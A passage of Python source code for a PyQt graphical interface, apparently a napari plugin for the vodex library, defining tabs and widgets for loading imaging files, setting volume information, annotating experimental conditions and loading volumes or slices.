Allows editing.\n \"\"\"\n\n def __init__(self, file_names=[]):\n super().__init__()\n\n self.setWindowTitle(\"Files in the recording\")\n\n # Create a top-level layout\n edit_layout = QVBoxLayout()\n # prepare the list\n self.list_widget = QListWidget()\n # setting drag drop mode\n self.list_widget.setDragDropMode(QAbstractItemView.InternalMove)\n self.fill_list(file_names)\n edit_layout.addWidget(self.list_widget)\n\n # Add the buttons\n button_layout = QHBoxLayout()\n self.delete_button = QPushButton(\"Delete File\")\n self.save_button = QPushButton(\"Save File Order\")\n self.edit_button = QPushButton(\"Edit Files\")\n\n button_layout.addWidget(self.delete_button)\n button_layout.addWidget(self.save_button)\n button_layout.addWidget(self.edit_button)\n self.edit_button.hide()\n\n edit_layout.addLayout(button_layout)\n\n self.setLayout(edit_layout)\n\n def fill_list(self, file_names):\n # clear existing items\n self.list_widget.clear()\n # add file names and order to the list\n for name in file_names:\n # adding items to the list widget\n self.list_widget.addItem(QListWidgetItem(name))\n\n def delete_file(self):\n \"\"\"\n Removes a file from the list.\n \"\"\"\n curItem = self.list_widget.currentItem()\n self.list_widget.takeItem(self.list_widget.row(curItem))\n\n def freeze(self):\n \"\"\"\n Freeze the file-list widget: doesn't allow any modifications until Edit button is pressed.\n \"\"\"\n self.list_widget.setDragEnabled(False)\n self.list_widget.setEnabled(False)\n # hide the buttons\n self.delete_button.hide()\n self.save_button.hide()\n self.edit_button.show()\n\n def unfreeze(self):\n \"\"\"\n Unfreeze the file-list widget: doesn't allow any modifications until Edit button is pressed.\n \"\"\"\n self.list_widget.setDragEnabled(True)\n self.list_widget.setEnabled(True)\n # hide a button\n self.edit_button.hide()\n # show the buttons\n self.delete_button.show()\n self.save_button.show()\n\n def get_file_names(self):\n \"\"\"\n Returns the list of files in the order as they appear in the list.\n \"\"\"\n all_items = [self.list_widget.item(i).text() for i in range(self.list_widget.count())]\n return all_items\n\n\nclass LoadExperimentTab(QWidget):\n def __init__(self):\n super().__init__()\n\n # Create a top-level layout\n main_layout = QVBoxLayout()\n self.setLayout(main_layout)\n\n self.load_db_l = QLabel(\"Load Existing Experiment:\")\n self.db_location = QLineEdit()\n self.load_db_pb = QPushButton(\"Load\")\n load_layout = QHBoxLayout()\n load_layout.addWidget(self.db_location)\n load_layout.addWidget(self.load_db_pb)\n\n main_layout.addWidget(self.load_db_l)\n main_layout.addLayout(load_layout)\n\n # File Manager Info\n self.info_fm = QLabel(\"File manager information:\")\n main_layout.addWidget(self.info_fm)\n self.fm_info_string = QTextBrowser()\n main_layout.addWidget(self.fm_info_string)\n\n # Volume Manager Info\n self.info_vm = QLabel(\"Volume manager information:\")\n main_layout.addWidget(self.info_vm)\n self.vm_info_string = QTextBrowser()\n main_layout.addWidget(self.vm_info_string)\n\n def browse(self):\n start_dir = str(Path().absolute())\n\n db_location = self.db_location.text().strip()\n if Path(db_location).is_dir():\n start_dir = db_location\n if Path(db_location).is_file():\n start_dir = Path(db_location).parent\n\n selected_db, ok = QFileDialog.getOpenFileName(caption='Load Database',\n directory=start_dir, filter=\"Database Files (*.db)\")\n self.db_location.setText(selected_db)\n\n\nclass NewExperimentTab(QWidget):\n def __init__(self):\n 
super().__init__()\n\n self.setWindowTitle(\"Files Tab\")\n # Create a top-level layout\n main_layout = QVBoxLayout()\n self.setLayout(main_layout)\n\n # 1. get directory box and browse button\n self.dir_location = QLineEdit()\n self.browse_button = QPushButton(\"Browse\")\n self.edit_dir_button = QPushButton(\"Edit\")\n main_layout.addWidget(QLabel(\"Enter the data directory\"))\n dir_layout = QHBoxLayout()\n dir_layout.addWidget(self.dir_location)\n dir_layout.addWidget(self.browse_button)\n dir_layout.addWidget(self.edit_dir_button)\n self.edit_dir_button.hide()\n main_layout.addLayout(dir_layout)\n\n # 2. get file type combo box\n self.file_types = QComboBox()\n ftype_layout = QFormLayout()\n ftype_layout.addRow(\"Choose file type:\", self.file_types)\n # grabs the file types from vodex core.py\n self.file_types.addItems(vx.VX_SUPPORTED_TYPES.keys())\n ftype_layout.addWidget(self.file_types)\n main_layout.addLayout(ftype_layout)\n main_layout.addWidget(QLabel(\"* Currently only supports tiffiles.\\n \"\n \"Support for other types can be added in the future.\"))\n\n # 3. fetch files button\n self.files_button = QPushButton(\"Fetch files\")\n main_layout.addWidget(self.files_button)\n\n # list file names\n main_layout.addWidget(QLabel(\"Inspect the files carefully!\\nThe files appear in the order in which they will \"\n \"be read (top to bottom)!\\nYou can delete unwanted files and reorder if the \"\n \"order is not correct.\"))\n self.list_widget = FileListDisplay([])\n main_layout.addWidget(self.list_widget)\n\n def browse(self):\n start_dir = str(Path().absolute())\n if Path(self.dir_location.text().strip()).is_dir():\n start_dir = self.dir_location.text()\n\n selected_dir = QFileDialog.getExistingDirectory(caption='Choose Directory', directory=start_dir)\n self.dir_location.setText(selected_dir)\n\n def freeze_dir(self):\n \"\"\"\n Makes the field to enter the directory inactive.\n \"\"\"\n self.dir_location.setEnabled(False)\n self.browse_button.hide()\n self.edit_dir_button.show()\n self.files_button.setEnabled(False)\n\n def unfreeze_dir(self):\n self.dir_location.setEnabled(True)\n self.browse_button.show()\n self.edit_dir_button.hide()\n self.files_button.setEnabled(True)\n\n\nclass VolumeTab(QWidget):\n def __init__(self):\n super().__init__()\n\n self.setWindowTitle(\"Volumes Tab\")\n # Create a top-level layout\n main_layout = QVBoxLayout()\n self.setLayout(main_layout)\n\n # Add volumes info layout\n self.fpv = QSpinBox()\n self.fgf = QSpinBox()\n self.fpv.setRange(1, 1000000000) # if range is not set, the maximum is 100, which can be not enough,\n self.fgf.setRange(0, 1000000000) # 100000000 is well within integer range, and hopefully is enough for anyone\n self.fgf.setValue(0)\n volume_info_lo = QFormLayout()\n volume_info_lo.addRow(\"Frames per volume:\", self.fpv)\n volume_info_lo.addRow(\"First good frame:\", self.fgf)\n main_layout.addLayout(volume_info_lo)\n\n # get volumes button\n self.vm = None\n self.volumes_button = QPushButton(\"Save Volume Info\")\n main_layout.addWidget(self.volumes_button)\n # change directory button\n self.edit_vol_button = QPushButton(\"Edit Volume Info\")\n main_layout.addWidget(self.edit_vol_button)\n self.edit_vol_button.hide()\n\n # list data info\n self.info = QLabel(\"Inspect the info carefully! 
Is it what you expect?\")\n main_layout.addWidget(self.info)\n self.volume_info_string = QTextBrowser()\n main_layout.addWidget(self.volume_info_string)\n\n def freeze_vm(self, do_nothing=False):\n if not do_nothing:\n # create FileManager\n self.fpv.setEnabled(False)\n self.fgf.setEnabled(False)\n self.volumes_button.hide()\n self.edit_vol_button.show()\n\n def unfreeze_vm(self):\n self.fpv.setEnabled(True)\n self.fgf.setEnabled(True)\n self.volumes_button.show()\n self.edit_vol_button.hide()\n\n\nclass SaveTab(QWidget):\n\n def __init__(self):\n super().__init__()\n # 1. save FileTab and VolumeTab into a database)\n main_layout = QVBoxLayout()\n self.setLayout(main_layout)\n main_layout.addWidget(horizontal_line())\n\n self.save_pb = QPushButton(\"Save\")\n self.save_le = QLineEdit()\n self.info_label = QLabel(\"[SAVE] Save experiment to a database file:\")\n main_layout.addWidget(QLabel(\"____________________________________________________\"))\n main_layout.addWidget(self.info_label)\n main_layout.addWidget(self.save_le)\n main_layout.addWidget(self.save_pb)\n\n def get_save_filename(self):\n \"\"\"\n Returns a filename to save the database or None.\n \"\"\"\n # from here: https://pythonprogramming.net/file-saving-pyqt-tutorial/\n\n save_name = self.save_le.text()\n save_directory = Path(save_name).parent\n if save_name.endswith('.db') and save_directory.is_dir():\n file_name = save_name\n else:\n dialog = QFileDialog(self, 'Save File ( data base file format, *.db )')\n dialog.setDefaultSuffix('.db')\n if save_directory.is_dir():\n dialog.setDirectory(save_directory.as_posix())\n file_name, ok = dialog.getSaveFileName()\n if ok:\n if not file_name.endswith('.db'):\n file_name += \".db\"\n self.save_le.setText(file_name)\n else:\n file_name = None\n return file_name\n\n\nclass InitialiseTab(QWidget):\n def __init__(self):\n super().__init__()\n # 1. 
save FileTab and VolumeTab into a database)\n main_layout = QVBoxLayout()\n self.setLayout(main_layout)\n # next step\n self.create_experiment = QPushButton(\"Create Experiment\")\n self.edit_experiment = QPushButton(\"Edit Experiment\")\n self.next_step = QLabel(\"NEXT STEPS: You can save the experiment to disk\\n\"\n \"or load individual volumes on the [Load/Save Data] tab\\n\"\n \"or add time annotations on the [Time Annotation]\\n\")\n main_layout.addWidget(self.create_experiment)\n main_layout.addWidget(self.edit_experiment)\n main_layout.addWidget(self.next_step)\n\n self.edit_experiment.hide()\n self.next_step.hide()\n\n\nclass LabelsTab(QWidget):\n \"\"\"\n Widget to get the information about individual label: it's name and description.\n \"\"\"\n\n def __init__(self):\n super().__init__()\n self.label_names = []\n\n self.main_lo = QVBoxLayout()\n self.setLayout(self.main_lo)\n\n # Table\n self.ROW_HEIGHT = 30 # pixels\n self.label_table = QTableWidget()\n self.set_up_table()\n self.main_lo.addWidget(self.label_table)\n\n # Add/ Delete buttons\n self.add_label = QPushButton(\"Add label\")\n self.delete_selected = QPushButton(\"Delete selected\")\n\n button_lo = QHBoxLayout()\n button_lo.addWidget(self.add_label)\n button_lo.addWidget(self.delete_selected)\n self.main_lo.addLayout(button_lo)\n\n # Error window\n self.msg = InputError()\n\n def set_up_table(self):\n self.label_table.setColumnCount(2)\n self.label_table.setColumnWidth(0, 150)\n # self.label_table.verticalHeader().hide()\n self.label_table.setHorizontalHeaderLabels([\"Label name\", \"Description (Optional)\"])\n self.label_table.setSelectionBehavior(QAbstractItemView.SelectRows)\n self.label_table.setSelectionMode(QAbstractItemView.SingleSelection)\n h_header = self.label_table.horizontalHeader()\n h_header.setSectionResizeMode(1, QHeaderView.ResizeMode.Stretch)\n\n # turn off editing for the first column\n delegate = ReadOnlyDelegate(self.label_table)\n self.label_table.setItemDelegateForColumn(0, delegate)\n\n def get_label_name(self):\n \"\"\"\n Receives a label name from the user, checks if the new label name is unique.\n If it is unique, returns the label name, if not, or if the name is empty returns none.\n \"\"\"\n label_name, ok = QInputDialog.getText(self, 'Enter label name',\n 'Try to choose meaningful names, \\n'\n 'for example: in an annotation called\"Light\" \\nthe labels could be '\n '\"on\" and \"off\" \\nto describe when the light was on or off.')\n\n if ok:\n # check that all the names are unique\n if label_name in self.label_names:\n self.launch_popup(\"The label names must be unique!\")\n label_name = None\n # check that it is not empty\n if not label_name:\n label_name = None\n else:\n label_name = None\n\n # add to the list of labels\n if label_name is not None:\n self.label_names.append(label_name)\n\n return label_name\n\n def add_row(self, label_name=None, description=\"\"):\n \"\"\"\n Adds the label name to the table.\n If the label_name is not provided, triggers the pop-up to ask for the label name.\n \"\"\"\n\n if label_name is not None:\n self.label_names.append(label_name)\n else:\n label_name = self.get_label_name()\n\n if label_name is not None:\n # add to the table\n n_rows = self.label_table.rowCount()\n self.label_table.insertRow(n_rows)\n self.label_table.setRowHeight(n_rows, self.ROW_HEIGHT)\n\n self.label_table.setItem(n_rows, 0, QTableWidgetItem(label_name))\n self.label_table.setItem(n_rows, 1, QTableWidgetItem(description))\n\n def delete_row(self, in_use: bool):\n \"\"\"\n 
in_use: indicates if the label is in use. If in use, it will not be deleted.\n \"\"\"\n if not in_use:\n selected_row = self.label_table.currentRow()\n name = self.label_table.item(selected_row, 0).text()\n self.label_names.remove(name)\n self.label_table.removeRow(selected_row)\n\n def get_selected_name(self):\n \"\"\"\n Returns the label name on the selected row.\n \"\"\"\n selected_row = self.label_table.currentRow()\n name = self.label_table.item(selected_row, 0).text()\n return name\n\n def get_names(self):\n \"\"\"\n Returns all the names in the table.\n \"\"\"\n n_rows = self.label_table.rowCount()\n state_names = []\n for row in range(n_rows):\n name = self.label_table.item(row, 0).text()\n state_names.append(name)\n return state_names\n\n def get_descriptions(self):\n \"\"\"\n Returns all the descriptions in the table.\n \"\"\"\n n_rows = self.label_table.rowCount()\n state_info = {}\n for row in range(n_rows):\n name = self.label_table.item(row, 0).text()\n state_info[name] = self.label_table.item(row, 1).text()\n return state_info\n\n def freeze(self):\n self.label_table.setEnabled(False)\n self.add_label.setEnabled(False)\n self.delete_selected.setEnabled(False)\n self.edit_labels.show()\n self.save_labels.hide()\n\n def unfreeze(self):\n self.label_table.setEnabled(True)\n self.add_label.setEnabled(True)\n self.delete_selected.setEnabled(True)\n self.edit_labels.hide()\n self.save_labels.show()\n\n def launch_popup(self, text):\n self.msg.setText(text)\n x = self.msg.exec_() # this will show our messagebox\n\n\nclass TimingTab(QWidget):\n \"\"\"\n Contains the information about the timing of the conditions.\n \"\"\"\n\n def __init__(self):\n super().__init__()\n # Create a top-level layout\n main_lo = QVBoxLayout()\n self.setLayout(main_lo)\n\n # Create and connect the combo box to switch between annotation type pages\n self.annotation_type = QComboBox()\n self.annotation_type.addItems([\"Cycle\", \"Timeline\"])\n main_lo.addWidget(self.annotation_type)\n\n table_lo = QHBoxLayout()\n # Label adder\n self.add_button = QPushButton(\"Add condition\")\n self.del_button = QPushButton(\"Delete condition\")\n self.ROW_HEIGHT = 30\n self.add_button.setFixedHeight(self.ROW_HEIGHT)\n\n input_lo = QVBoxLayout()\n input_lo.addWidget(self.add_button)\n input_lo.addWidget(self.del_button)\n input_lo.addStretch(42)\n table_lo.addLayout(input_lo)\n\n # Table\n self.table = QTableWidget()\n self.set_up_table()\n table_lo.addWidget(self.table)\n main_lo.addLayout(table_lo)\n\n self.msg = InputError()\n\n def set_up_table(self):\n self.table.setColumnCount(2)\n self.table.setColumnWidth(0, 150)\n self.table.setHorizontalHeaderLabels([\"Label name\", \"Duration (in frames!)\"])\n self.table.setSelectionBehavior(QAbstractItemView.SelectRows)\n self.table.setSelectionMode(QAbstractItemView.SingleSelection)\n h_header = self.table.horizontalHeader()\n h_header.setSectionResizeMode(1, QHeaderView.ResizeMode.Stretch)\n\n def add_row(self, labels: List[str], label_name: str = None, duration: int = None):\n \"\"\"\n Adds a row to the table and sets the widgets in the cells.\n\n Args:\n labels: available label names to add to the combo box.\n label_name: the name of the label to set for the row\n duration: the duration to set for the row\n Learning Resources:\n Instead of setting widgets for each cell,\n a better way would be to use a delegate https://forum.qt.io/topic/88486/dropdown-in-qtablewdget\n \"\"\"\n # create the elements to insert\n label_choice = QComboBox()\n label_duration = QSpinBox()\n 
label_duration.setRange(1, 1000000000)\n label_choice.addItems(labels)\n label_duration.setMinimum(1)\n\n n_rows = self.table.rowCount()\n self.table.insertRow(n_rows)\n self.table.setRowHeight(n_rows, self.ROW_HEIGHT)\n\n self.table.setCellWidget(n_rows, 0, label_choice)\n self.table.setCellWidget(n_rows, 1, label_duration)\n\n # set the values if provided\n if label_name is not None:\n label_choice.setCurrentText(label_name)\n if duration is not None:\n label_duration.setValue(duration)\n\n def delete_row(self):\n selected_row = self.table.currentRow()\n self.table.removeRow(selected_row)\n\n def update_choices(self, labels):\n \"\"\"\n Updates the labels on all the combo boxes.\n Assumes that all the chosen labels are present in the new labels.\n \"\"\"\n n_rows = self.table.rowCount()\n for row in range(n_rows):\n chosen_label = self.table.cellWidget(row, 0).currentText()\n assert chosen_label in labels, f\"A label {chosen_label} is chosen, \" \\\n f\"but it is missing from the labels: {labels}\"\n self.table.cellWidget(row, 0).clear()\n self.table.cellWidget(row, 0).addItems(labels)\n self.table.cellWidget(row, 0).setCurrentText(chosen_label)\n\n def check_in_use(self, label_name: str) -> bool:\n \"\"\"\n Checks if a given label name has been chosen.\n \"\"\"\n chosen_names = self.get_names_sequence()\n in_use = label_name in chosen_names\n if in_use:\n self.launch_popup(f\"Label {label_name} is in use!\")\n return in_use\n\n def get_names_sequence(self) -> List[str]:\n n_rows = self.table.rowCount()\n label_name_order = [self.table.cellWidget(row, 0).currentText() for row in range(n_rows)]\n return label_name_order\n\n def get_duration_sequence(self):\n n_rows = self.table.rowCount()\n duration = [self.table.cellWidget(row, 1).value() for row in range(n_rows)]\n return duration\n\n def launch_popup(self, text):\n self.msg.setText(text)\n x = self.msg.exec_()\n\n\nclass AnnotationPage(QWidget):\n\n def __init__(self):\n super().__init__()\n\n # Create a top-level layout\n self.main_layout = QVBoxLayout()\n self.setLayout(self.main_layout)\n\n # create labels Tab\n self.labels = LabelsTab()\n self.timing = TimingTab()\n self.splitter = QSplitter(Qt.Vertical)\n self.splitter.addWidget(self.labels)\n self.splitter.addWidget(self.timing)\n self.main_layout.addWidget(self.splitter)\n\n self.add_pb = QPushButton(\"Add annotation to the experiment\")\n self.edit_pb = QPushButton(\"Edit annotation\")\n self.delete_pb = QPushButton(\"Delete annotation\")\n self.main_layout.addWidget(self.add_pb)\n buttons_lo = QHBoxLayout()\n buttons_lo.addWidget(self.edit_pb)\n buttons_lo.addWidget(self.delete_pb)\n self.main_layout.addLayout(buttons_lo)\n self.edit_pb.hide()\n self.delete_pb.hide()\n\n def freeze(self):\n self.add_pb.hide()\n self.edit_pb.show()\n self.delete_pb.show()\n\n self.labels.setEnabled(False)\n self.timing.setEnabled(False)\n\n def unfreeze(self):\n self.add_pb.show()\n self.edit_pb.hide()\n self.delete_pb.hide()\n\n self.labels.setEnabled(True)\n self.timing.setEnabled(True)\n\n\nclass AnnotationTab(QWidget):\n\n def __init__(self):\n super().__init__()\n # Create a top-level layout\n self.main_layout = QVBoxLayout()\n self.setLayout(self.main_layout)\n\n self.annotations = {}\n self.add_annotation_pb = QPushButton(\"Add annotation\")\n self.main_layout.addWidget(self.add_annotation_pb)\n\n self.pageCombo = None\n self.stackedLayout = None\n\n self.msg = InputError()\n\n def switchPage(self):\n \"\"\"\n What to do when the annotation is changed.\n Change the stackedLayout based on 
the pageCombo currentIndex.\n \"\"\"\n self.stackedLayout.setCurrentIndex(self.pageCombo.currentIndex())\n\n def initialize_annotation_list(self):\n switch_lo = QHBoxLayout()\n switch_lo.addWidget(QLabel(\"Available annotations:\"))\n\n # Create and connect the combo box to switch between annotation type pages\n self.pageCombo = QComboBox()\n switch_lo.addWidget(self.pageCombo)\n\n # Create the stacked layout\n self.stackedLayout = QStackedLayout()\n\n # Add the combo box and the stacked layout to the top-level layout\n self.main_layout.addLayout(switch_lo)\n self.main_layout.addLayout(self.stackedLayout)\n\n def create_ap(self, annotation_name):\n \"\"\"\n Creates an Annotation page and adds it to the Annotation tab\n \"\"\"\n # add information about the annotations\n annotation = AnnotationPage()\n self.annotations[annotation_name] = annotation\n self.pageCombo.addItem(annotation_name)\n self.stackedLayout.addWidget(annotation)\n\n # set the added item active\n self.pageCombo.setCurrentText(annotation_name)\n self.switchPage()\n\n def get_annotation_name(self):\n annotation_name, ok = QInputDialog.getText(self, 'Enter annotation name',\n 'Try to choose meaningful names, '\n 'for example:\\n\"Light\" to describe '\n 'whether the light was on or off;\\n'\n '\"Drug\" to set the time when you '\n 'added the drug;')\n if ok:\n # check that all the names are unique\n if annotation_name in self.annotations.keys():\n self.launch_popup(\"The annotation names must be unique!\")\n annotation_name = None\n # check that the name is not empty\n if not annotation_name:\n self.launch_popup(\"The annotation name cannot be empty!\")\n annotation_name = None\n else:\n annotation_name = None\n return annotation_name\n\n def launch_popup(self, text):\n self.msg.setText(text)\n x = self.msg.exec_()\n\n\nclass AnnotationCheckboxes(QWidget):\n def __init__(self, annotation_name: str, label_names: List[str]):\n super().__init__()\n self.layout = QVBoxLayout()\n self.setLayout(self.layout)\n\n self.group = annotation_name\n self.group_label = QLabel(annotation_name)\n self.layout.addWidget(self.group_label)\n\n self.checkboxes = {}\n self.update_labels(label_names)\n\n def remove_unused(self, label_names: List[str]):\n # iterate over a copy of the keys: entries are popped from the dict below\n for name in list(self.checkboxes.keys()):\n if name not in label_names:\n child = self.layout.takeAt(self.checkboxes[name])\n self.checkboxes.pop(name)\n if child.widget():\n child.widget().deleteLater()\n\n def add_new(self, label_names: List[str]):\n for name in label_names:\n if name not in self.checkboxes.keys():\n i_name = self.layout.count()\n self.checkboxes[name] = i_name\n self.layout.insertWidget(i_name, LabelCheckBox(self.group, name))\n\n def update_labels(self, label_names: List[str]):\n self.remove_unused(label_names)\n self.add_new(label_names)\n\n def get_checked_conditions(self):\n conditions = []\n for i_checkbox in self.checkboxes.values():\n checkbox = self.layout.itemAt(i_checkbox).widget()\n if checkbox.isChecked():\n conditions.append(checkbox.get_label_info())\n return conditions\n\n\nclass DataReaderWriterTab(QWidget):\n \"\"\"\n Loads and saves volumes.\n \"\"\"\n\n def __init__(self, napari_viewer):\n super().__init__()\n\n self.labels = {}\n self._napari = napari_viewer\n\n self.ROW_HEIGHT = 30\n # Create a top-level layout\n self.main_layout = QVBoxLayout()\n self.setLayout(self.main_layout)\n\n # 1. 
Individual volumes\n section1_title = QLabel(\"[LOAD OPTION 1] Load based on volumes/slices IDs\")\n self.main_layout.addWidget(QLabel(\"____________________________________________________\"))\n self.main_layout.addWidget(section1_title)\n\n self.v_info_pb = QPushButton(\"\")\n self.v_info_pb.setIcon(self.style().standardIcon(getattr(QStyle, \"SP_MessageBoxInformation\")))\n self.v_info_pb.clicked.connect(self.how_to_volumes)\n v_label = QLabel(\"Volumes: \")\n self.volumes = QLineEdit()\n # Regex explanation :\n # this allows integers separated by , and slices : .\n # For example: 12, 34, 4:56 , 72 : 34 is a valid input\n # (although slice 72:34 is invalid, it will be filtered out later)\n # but this: 4, 5, 6:7 : 8 is invalid because of two consecutive \":\"\n reg_ex = QRegExp(r\"^ *(\\d{1,}|\\d{1,} *: *\\d{1,})( *|, *\\d{1,}|, *\\d{1,} *: *\\d{1,}| *)*$\")\n input_validator = QRegExpValidator(reg_ex, self.volumes)\n self.volumes.setValidator(input_validator)\n\n # slice input\n # TODO: add check if the slices are valid for the current dataset (use Signals?) (low priority)\n self.s_info_pb = QPushButton(\"\")\n self.s_info_pb.setIcon(self.style().standardIcon(getattr(QStyle, \"SP_MessageBoxInformation\")))\n self.s_info_pb.clicked.connect(self.how_to_slices)\n s_label = QLabel(\"Slices: \")\n self.slices = QLineEdit()\n self.slices.setValidator(input_validator)\n\n volume_lo = QHBoxLayout()\n volume_lo.addWidget(v_label)\n volume_lo.addWidget(self.volumes)\n volume_lo.addWidget(self.v_info_pb)\n slice_lo = QHBoxLayout()\n slice_lo.addWidget(s_label)\n slice_lo.addWidget(self.slices)\n slice_lo.addWidget(self.s_info_pb)\n volume_slice_lo = QVBoxLayout()\n volume_slice_lo.addLayout(volume_lo)\n volume_slice_lo.addLayout(slice_lo)\n\n # 2 checkboxes whether to consider the head and the tail of the dataset\n self.head_cb = QCheckBox(\"Head\")\n self.tail_cb = QCheckBox(\"Tail\")\n head_tail_lo = QVBoxLayout()\n head_tail_lo.addWidget(self.head_cb)\n head_tail_lo.addWidget(self.tail_cb)\n\n volume_slice_checkbox_lo = QHBoxLayout()\n volume_slice_checkbox_lo.addLayout(volume_slice_lo)\n volume_slice_checkbox_lo.addLayout(head_tail_lo)\n\n self.main_layout.addLayout(volume_slice_checkbox_lo)\n self.load_volumes_pb = QPushButton(\"Load\")\n self.main_layout.addWidget(self.load_volumes_pb)\n self.main_layout.addWidget(horizontal_line())\n\n # 2. 
Annotation list\n self.main_layout.addWidget(QLabel(\"____________________________________________________\"))\n section2_title = QLabel(\"[LOAD OPTION 2] Load based on experimental conditions\")\n self.a_info_pb = QPushButton(\"\")\n self.a_info_pb.setIcon(self.style().standardIcon(getattr(QStyle, \"SP_MessageBoxInformation\")))\n self.a_info_pb.clicked.connect(self.how_to_annotations)\n intro_lo = QHBoxLayout()\n intro_lo.addWidget(section2_title)\n intro_lo.addWidget(self.a_info_pb)\n self.main_layout.addLayout(intro_lo)\n\n self.annotations = {}\n\n self.checkbox_lo = QHBoxLayout()\n self.checkboxes = []\n self.info_text = QLabel(\"Add time annotation to the experiment\\nto see the options.\")\n self.checkbox_lo.addWidget(self.info_text)\n\n self.main_layout.addLayout(self.checkbox_lo)\n\n buttons_lo = QVBoxLayout()\n logic_label = QLabel(\"Use logic: \")\n self.logic_box = QComboBox()\n self.logic_box.addItems([\"or\", \"and\"])\n self.find_volumes = QPushButton(\"Find volumes\")\n self.volumes_label = QLabel(\"Volumes that satisfy the conditions:\")\n self.volumes_info = QTextBrowser()\n self.load_conditions_pb = QPushButton(\"Load\")\n\n buttons_lo.addWidget(logic_label)\n buttons_lo.addWidget(self.logic_box)\n buttons_lo.addWidget(self.find_volumes)\n buttons_lo.addWidget(self.volumes_label)\n buttons_lo.addWidget(self.volumes_info)\n buttons_lo.addWidget(self.load_conditions_pb)\n\n self.main_layout.addLayout(buttons_lo)\n self.main_layout.addWidget(horizontal_line())\n\n # self.main_layout.addStretch(42)\n self.msg = InputError(\"Info\")\n\n def launch_popup(self, text):\n self.msg.setText(text)\n x = self.msg.exec_()\n\n def update_labels(self, labels: dict):\n self.info_text.hide()\n # remove unused\n # use list() to force a copy of the keys, since entries are popped while iterating\n for annotation_name in list(self.annotations):\n if annotation_name not in labels:\n widget = self.annotations.pop(annotation_name)\n widget.setParent(None)\n widget.deleteLater()\n\n # add new\n for annotation_name, label_names in labels.items():\n if annotation_name not in self.annotations:\n self.annotations[annotation_name] = AnnotationCheckboxes(annotation_name, label_names)\n self.checkbox_lo.addWidget(self.annotations[annotation_name])\n else:\n self.annotations[annotation_name].update_labels(label_names)\n\n def how_to_volumes(self):\n text = \"Enter the indices for the volumes you would like to load. \" \\\n \"Valid inputs include individual indices, comma-separated lists, or ranges using a colon. \" \\\n \"Spaces are ignored. The volumes are loaded in ascending order. For example:\\n\" \\\n \"• Individual indices: 0, 4, 6\\n\" \\\n \"• Ranges: 9:12 (note that volume 12 will be loaded)\\n\" \\\n \"• Combined inputs: 2, 4, 6, 9:12, 19 (loads volumes 2, 4, 6, 9, 10, 11, 12, and 19)\\n\" \\\n \"Use the examples shown to specify the desired volumes to load.\\n\\n\" \\\n \"If slices to load are specified, you can leave the volumes empty. \" \\\n \"Then the specified slices will be loaded for all volumes.\\n\\n\" \\\n \"If the dataset has unfilled volumes at the beginning or end of the recording, \" \\\n \"you can include/exclude them by checking the Head and Tail checkboxes. \" \\\n \"This might be important if you are trying to load a set of slices that \" \\\n \"are not present in the Head or Tail of the dataset.\"\n\n self.launch_popup(text=text)\n\n def how_to_slices(self):\n text = \"Enter the indices for the slices you would like to load. 
\" \\\n \"Valid inputs include individual slices, \" \\\n \"comma-separated, or ranges using a colon. Spaces are ignored. \" \\\n \"ORDER IS IGNORED ( loaded in ascending order! ) \" \\\n \"For example:\\n\" \\\n \"• Individual slices: 0, 2, 5\\n\" \\\n \"• Ranges: 0:5 (note that volume 5 WILL BE LOADED)\\n\" \\\n \"• Combined inputs: 0, 2, 5:7, 9 (loads slices 0, 2, 5, 6, 7, 9)\\n\" \\\n \"Use the format shown in the examples to specify the desired slices to load.\\n\\n\" \\\n \"If slices to volumes are specified, you can leave the slices empty. \" \\\n \"Then all the slices will be loaded for the specified volumes.\\n\\n\" \\\n \"If the dataset has unfilled volumes at the beginning or end of the recording, \" \\\n \"you can include/exclude them by checking the Head and Tail checkboxes.\" \\\n \"This might be important if you are trying to load a set of slices that \" \\\n \"are not present in the Head or Tail of the dataset.\"\n\n self.launch_popup(text=text)\n\n def how_to_annotations(self):\n text = \"If you have added time annotations to the experiment, you will see the annotation's names and labels. \" \\\n \"Check the checkboxes by the labels for which you want to get the volumes, \" \\\n \"and choose how to combine them with a logical OR or a logical AND. \" \\\n \"Then, click the 'Find volumes' button to get a list of volume IDs that \" \\\n \"correspond to the chosen conditions or 'Load' to load all such volumes into napari.\\n\\n\" \\\n \"When you are choosing 'OR', all the conditions you picked will be combined with a logical OR.\" \\\n \" This means that vodex will pick volumes with slices that correspond \" \\\n \"to at least one of the conditions \" \\\n \"that you picked. It does not mean that the whole volume corresponds to one of the conditions. \" \\\n \"Half of the slices in the volume can correspond to one condition and the other half to another.\\n\\n\" \\\n \"When you are choosing 'AND', vodex will pick volumes with slices that correspond to all the \" \\\n \"conditions that you picked at the same time. 
If at least one slice in a volume does not correspond\" \\\n \" to all the conditions, such volume will not be picked.\"\n\n self.launch_popup(text=text)\n\n def get_volumes(self):\n \"\"\"\n Gets volumes from text.\n \"\"\"\n requested_volumes = self.volumes.text()\n volumes = []\n if requested_volumes:\n for vol in requested_volumes.split(\",\"):\n if \":\" in vol:\n start, end = vol.split(\":\")\n # compare numerically, not as strings\n assert int(start) < int(end), f\"The volume range start {start} must be smaller than the end {end}\"\n volumes.extend(range(int(start.strip()), (int(end.strip()) + 1)))\n else:\n volumes.append(int(vol.strip()))\n # TODO: check for repeats ?\n return volumes, requested_volumes\n\n def get_slices(self):\n \"\"\"\n Gets slices from text.\n \"\"\"\n requested_slices = self.slices.text()\n slices = []\n if requested_slices:\n for sl in requested_slices.split(\",\"):\n if \":\" in sl:\n start, end = sl.split(\":\")\n # compare numerically, not as strings\n assert int(start) < int(end), f\"The slice range start {start} must be smaller than the end {end}\"\n slices.extend(range(int(start.strip()), (int(end.strip()) + 1)))\n else:\n slices.append(int(sl.strip()))\n return slices, requested_slices\n\n\nclass VodexView(QWidget):\n \"\"\"\n Does everything about the GUI View.\n \"\"\"\n\n def __init__(self, viewer):\n super().__init__()\n\n self.nt = NewExperimentTab()\n self.lt = LoadExperimentTab()\n\n self.vt = VolumeTab()\n self.st = SaveTab()\n self.it = InitialiseTab()\n self.at = AnnotationTab()\n self.dt = DataReaderWriterTab(viewer)\n self.napari = viewer\n\n self.main_layout = QVBoxLayout()\n self.setLayout(self.main_layout)\n\n self.nt_pb = QPushButton(\"Create New Experiment\")\n self.lt_pb = QPushButton(\"Load Saved Experiment\")\n self.main_layout.addWidget(self.lt_pb)\n self.main_layout.addWidget(self.nt_pb)\n\n def initialize_new_experiment(self):\n self.nt_pb.hide()\n self.lt_pb.hide()\n\n tabs = QTabWidget()\n # 1. New Experiment Tab\n # More on QSplitter:\n # https://www.tutorialspoint.com/pyqt/pyqt_qsplitter_widget.htm\n splitter_1 = QSplitter(Qt.Vertical)\n 